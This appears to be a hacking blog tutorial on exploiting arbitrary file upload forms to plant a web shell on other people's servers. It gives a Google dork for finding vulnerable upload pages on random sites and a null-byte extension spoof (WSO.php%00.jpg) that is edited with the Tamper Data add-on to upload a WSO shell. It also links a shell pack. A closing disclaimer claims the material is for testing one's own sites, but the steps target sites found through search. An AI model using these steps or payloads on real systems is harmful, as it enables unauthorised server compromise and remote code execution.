Exploiting Arbitrary File Upload Vulnerabilities


An arbitrary file upload vulnerability is a vulnerability that can be exploited by malicious users (Hackers) to compromise a system. In this case, it’s incorrectly validating the file extension on any uploaded file. Well…. that is pretty much it. If you don’t understand what I just said, then this is probably not the tutorial for you. If used correctly, it can lead to shelling, executing remote code..all kinds of good or bad stuff.

Requirements

Now for this tutorial, you’re going to need FireFox, and an add on called Tamper Data.

You can download it here

Once you got it installed, restart FireFox and you can get started.

Finding Vulnerabilities

Now what you’re going to want to do is find a vulnerable upload form. How do you find these? A pretty common method known around here, using google dorks.

Here’s the example I’ll be using in this tutorial.

Code:

inurl:/upload.php intext:Image Upload

Now you can create your own, find your own, and use your own dorks.

Once you’ve found your site, you should be at an upload form.

It should look something like this:

Arbitrary-File-1

Testing The Upload Form

Now try and upload your shell in regular format, to see if you’ll need to continue.

Arbitrary-File-2

Code:

Unrecognized image type

Now try and upload it in image format.

Arbitrary-File-3

 

Arbitrary-File-4

Modifying The POST Content

It worked, now we’re going to go back, re upload, and modify the POST content.

Go back to your upload form, select your shell in image format, and go to Tools > Options > Tamper Data.

It should look something like this:

Arbitrary-File-5

Now click start tamper, and upload your file.

A popup will come up and ask you if you want to continue tampering. If it’s sending information about the upload form, click continue tampering and click tamper.

Arbitrary-File-6

Now a whole new form should come up, it looks like this.

Arbitrary-File-7

Everything on the right is where we change our file extension. That is the POST data.

Now find your filename and remove your nullbyte and spoofed extension. Here’s an example of what it should be changed to:

Code:

WSO.php%00.jpg

Code:

WSO.php

Arbitrary-File-8

 

Arbitrary-File-9

Now click OK, and your file should upload. Now all you have to do is find your shell, sometimes you can right click it (if it’s a broken image), other times it’ll be in the page source. This will work with several different upload forms, inside administrator panels, and other things as well. Hope you guys understand, good luck and happy hacking.

Resources

Shell Pack (Image Format) || Virus Scan

Tamper Data


Video

Note: The previous tutorial has been provided so that you might test your own sites and be aware of your own vulnerabilities. Please do not use this knowledge in a malicious manner. I don’t encourage anyone to do anything illegal, or use such a method on equipment and servers you do not own.


Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *